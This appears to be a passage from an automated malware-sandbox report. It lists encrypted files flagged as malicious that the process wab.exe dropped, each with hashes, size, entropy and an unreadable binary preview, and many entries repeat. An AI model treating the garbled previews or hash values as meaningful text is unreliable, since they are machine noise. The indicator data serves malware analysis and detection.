                                                                                SHA1:EF8CEFA4CAD601DC57C5D68FCEB4046550DA61CC
                                                                                SHA-256:FC3D9F9968BA951642E8BD8F4662E9C4D85BC53385212613F6898EF929AE7555
                                                                                SHA-512:029109A4F059F3ABADB0B99C16A85F939CEACB8F1C868FC66DA655BBC20AF2AD7EA02DF090D1E1D33104BCBDD341161996DE6FCE0E258961116406B9CD1E221E
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):155454
                                                                                Entropy (8bit):7.998608432895152
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FDNpa8KHo5M:ZIc0afzkI9WaXNMyQH3bNxAj/5FDNAJH
                                                                                MD5:381B56764BD2A00E99936FF5D19F59FF
                                                                                SHA1:EF8CEFA4CAD601DC57C5D68FCEB4046550DA61CC
                                                                                SHA-256:FC3D9F9968BA951642E8BD8F4662E9C4D85BC53385212613F6898EF929AE7555
                                                                                SHA-512:029109A4F059F3ABADB0B99C16A85F939CEACB8F1C868FC66DA655BBC20AF2AD7EA02DF090D1E1D33104BCBDD341161996DE6FCE0E258961116406B9CD1E221E
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):155454
                                                                                Entropy (8bit):7.998608432895152
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FDNpa8KHo5M:ZIc0afzkI9WaXNMyQH3bNxAj/5FDNAJH
                                                                                MD5:381B56764BD2A00E99936FF5D19F59FF
                                                                                SHA1:EF8CEFA4CAD601DC57C5D68FCEB4046550DA61CC
                                                                                SHA-256:FC3D9F9968BA951642E8BD8F4662E9C4D85BC53385212613F6898EF929AE7555
                                                                                SHA-512:029109A4F059F3ABADB0B99C16A85F939CEACB8F1C868FC66DA655BBC20AF2AD7EA02DF090D1E1D33104BCBDD341161996DE6FCE0E258961116406B9CD1E221E
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):155454
                                                                                Entropy (8bit):7.998608432895152
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FDNpa8KHo5M:ZIc0afzkI9WaXNMyQH3bNxAj/5FDNAJH
                                                                                MD5:381B56764BD2A00E99936FF5D19F59FF
                                                                                SHA1:EF8CEFA4CAD601DC57C5D68FCEB4046550DA61CC
                                                                                SHA-256:FC3D9F9968BA951642E8BD8F4662E9C4D85BC53385212613F6898EF929AE7555
                                                                                SHA-512:029109A4F059F3ABADB0B99C16A85F939CEACB8F1C868FC66DA655BBC20AF2AD7EA02DF090D1E1D33104BCBDD341161996DE6FCE0E258961116406B9CD1E221E
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):155454
                                                                                Entropy (8bit):7.998608432895152
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOGLyQH3bNfpEljEk5FDNpa8KHo5M:ZIc0afzkI9WaXNMyQH3bNxAj/5FDNAJH
                                                                                MD5:381B56764BD2A00E99936FF5D19F59FF
                                                                                SHA1:EF8CEFA4CAD601DC57C5D68FCEB4046550DA61CC
                                                                                SHA-256:FC3D9F9968BA951642E8BD8F4662E9C4D85BC53385212613F6898EF929AE7555
                                                                                SHA-512:029109A4F059F3ABADB0B99C16A85F939CEACB8F1C868FC66DA655BBC20AF2AD7EA02DF090D1E1D33104BCBDD341161996DE6FCE0E258961116406B9CD1E221E
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):167280
                                                                                Entropy (8bit):7.998830633713633
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOZQ4LuW2HAbY6BF3E04FZewDBWFyH8io6:ZIc0afzkI9WaXNZuW2gbYWtE5FZDDowH
                                                                                MD5:CEB95EEB6D18AEEA6B72C2CF1BCD35E1
                                                                                SHA1:EEE004AF8FA2FF9EB333CF1ED8395C9B1A903B6A
                                                                                SHA-256:2B770849CDE5AD7511FC29902D059651D78EB68594A59246C67C814E66183DB6
                                                                                SHA-512:87B3077697CF019233E14E3E5409CDD764F722A67D566BFE2EE054EBD421C4F6D54C56CAA6A434593B72027FB5E5CEACA419B566321894ED9FE0730B8A8E552B
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171316
                                                                                Entropy (8bit):7.9988597070518015
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhcVx6ONP2yOHoajEBDabVRACt68ncydPNS6+lD8:ZIc0afzkI9WaXNh+R2bHfAobtt6ChN97
                                                                                MD5:DACC41F0BCB3143A75058B7647BEA418
                                                                                SHA1:EA48F90A80CFC19481CEDC876530D3C2B49DB0A3
                                                                                SHA-256:D25940EF8305B0FD2C399ABB673344A472A948D121CDED63B8CDF1C1832556BF
                                                                                SHA-512:FF63FD1FE46C737BD5450CD026696CDBF9F0261DFD1EFE8EE6892057453EF0A069711B9DE2BEAB9149E33304F1D51FBEB9BAD11C02B05BDA7DFA35DB33693757
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):171384
                                                                                Entropy (8bit):7.998929317235982
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUhSnDm:ZIc0afzkI9WaXNhFj255YcLqdOhm6
                                                                                MD5:4E6EB766825442562EF142A15F553BBE
                                                                                SHA1:560478A9A906E118BAAE330E2BEB05ABF7ED9FED
                                                                                SHA-256:E37F0DB5C220E8C48E94C63D2D7E7193E09AA752B86D6E42C18306646207A2B1
                                                                                SHA-512:F2509B0DE3DB6A28E1A07F18F0DB7D843526243A7176997847FCF6EB976195E25C6C7778A8700F934467831F41FB6BDE5F011641E980C5F4B30DD4B48BD78723
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):172562
                                                                                Entropy (8bit):7.998902123836641
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rD4c1k3e:ZIc0afzkI9WaXNhFj255YcLqdKMk3e
                                                                                MD5:113E607A60814FF82517DC82BB21C6B5
                                                                                SHA1:9D01AFEA13E6AE8EA8BFA7CE1A4B795A504E891D
                                                                                SHA-256:68CE03CF1E6CFC07118A46E91E58634B994AF3C3FE34993CEA29CE8ADE797F46
                                                                                SHA-512:D3BE88F2539281514C83B8C97524D59AAD71E4E893CBEA8C9F5505801941F860D495C11FA5B2DDE40B0DA9D44147AEB94B3FF022B11838FDFB4F8E4A8AD8892B
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):172845
                                                                                Entropy (8bit):7.998947318367916
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rD4c1vC61/50zR:ZIc0afzkI9WaXNhFj255YcLqdKMvCq/I
                                                                                MD5:4A6652CD94FD24DB2BEF9ECBA402DD59
                                                                                SHA1:172FA4FB4969220623B2672D88BD2CC89C29B0A9
                                                                                SHA-256:C0DE7C92184EA7B7001711611455A2D2406A57C4621BA19A158B79A202B29989
                                                                                SHA-512:36307A74B89B6B0E2A5C100D79BD9B5727955B048E83AB82D63300BD49926D06855282BFC57ED34B5E6EECABBE6DC490E8C03226B0065A328A9DC1F8604CBACA
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):172819
                                                                                Entropy (8bit):7.998922755300191
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUGzcpTEdu:ZIc0afzkI9WaXNhFj255YcLqdOGzcpTD
                                                                                MD5:997B5E0893306FAD9D3CC5B558365A76
                                                                                SHA1:47369EBD21858AB085F1FB0B8269C8B41D9226EC
                                                                                SHA-256:1FB3DB236B9716733538E518C96DC41D332967E164CC275CC92960ED312F8112
                                                                                SHA-512:93FFBBB551053226197BD502768DA3D09033A0C8C4E0B711A213F6158345526C5B3F6E69EC83267C1CA330F92C59945E824A95AFDCEB11786C4A3C516923FCF6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):172819
                                                                                Entropy (8bit):7.998922755300191
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUGzcpTEdu:ZIc0afzkI9WaXNhFj255YcLqdOGzcpTD
                                                                                MD5:997B5E0893306FAD9D3CC5B558365A76
                                                                                SHA1:47369EBD21858AB085F1FB0B8269C8B41D9226EC
                                                                                SHA-256:1FB3DB236B9716733538E518C96DC41D332967E164CC275CC92960ED312F8112
                                                                                SHA-512:93FFBBB551053226197BD502768DA3D09033A0C8C4E0B711A213F6158345526C5B3F6E69EC83267C1CA330F92C59945E824A95AFDCEB11786C4A3C516923FCF6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):172819
                                                                                Entropy (8bit):7.998922755300191
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rUGzcpTEdu:ZIc0afzkI9WaXNhFj255YcLqdOGzcpTD
                                                                                MD5:997B5E0893306FAD9D3CC5B558365A76
                                                                                SHA1:47369EBD21858AB085F1FB0B8269C8B41D9226EC
                                                                                SHA-256:1FB3DB236B9716733538E518C96DC41D332967E164CC275CC92960ED312F8112
                                                                                SHA-512:93FFBBB551053226197BD502768DA3D09033A0C8C4E0B711A213F6158345526C5B3F6E69EC83267C1CA330F92C59945E824A95AFDCEB11786C4A3C516923FCF6
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):172845
                                                                                Entropy (8bit):7.998947318367916
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rD4c1vC61/50zR:ZIc0afzkI9WaXNhFj255YcLqdKMvCq/I
                                                                                MD5:4A6652CD94FD24DB2BEF9ECBA402DD59
                                                                                SHA1:172FA4FB4969220623B2672D88BD2CC89C29B0A9
                                                                                SHA-256:C0DE7C92184EA7B7001711611455A2D2406A57C4621BA19A158B79A202B29989
                                                                                SHA-512:36307A74B89B6B0E2A5C100D79BD9B5727955B048E83AB82D63300BD49926D06855282BFC57ED34B5E6EECABBE6DC490E8C03226B0065A328A9DC1F8604CBACA
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):172406
                                                                                Entropy (8bit):7.99889616700893
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOhfV7jDny5fzVCUKIhPLFNud5rD4c1mzjfbgz:ZIc0afzkI9WaXNhFj255YcLqdKMifMz
                                                                                MD5:C1F3C48F5362FAF9E4F7865A65A4CA7D
